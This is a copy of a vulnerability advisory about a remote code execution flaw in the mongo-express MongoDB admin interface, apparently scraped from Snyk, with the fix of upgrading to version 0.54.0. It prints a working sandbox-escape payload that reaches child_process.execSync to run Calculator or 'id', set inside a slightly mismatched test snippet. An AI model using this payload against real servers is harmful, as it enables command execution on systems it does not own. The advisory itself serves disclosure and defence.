https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215
贡献者 共获得 0KB
mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the toBSON
method. A misuse of the vm
dependency to perform exec
commands in a non-safe environment.
# MacOSthis.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator') it('should not be executable', function () { const test = ` this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString()) `; const result = bson.toBSON(calculatorTest); });
Upgrade mongo-express
to version 0.54.0 or higher.
GitHub PR
苏公网安备 32132202001088号
| Copyright 北极熊 北格技术 版权所有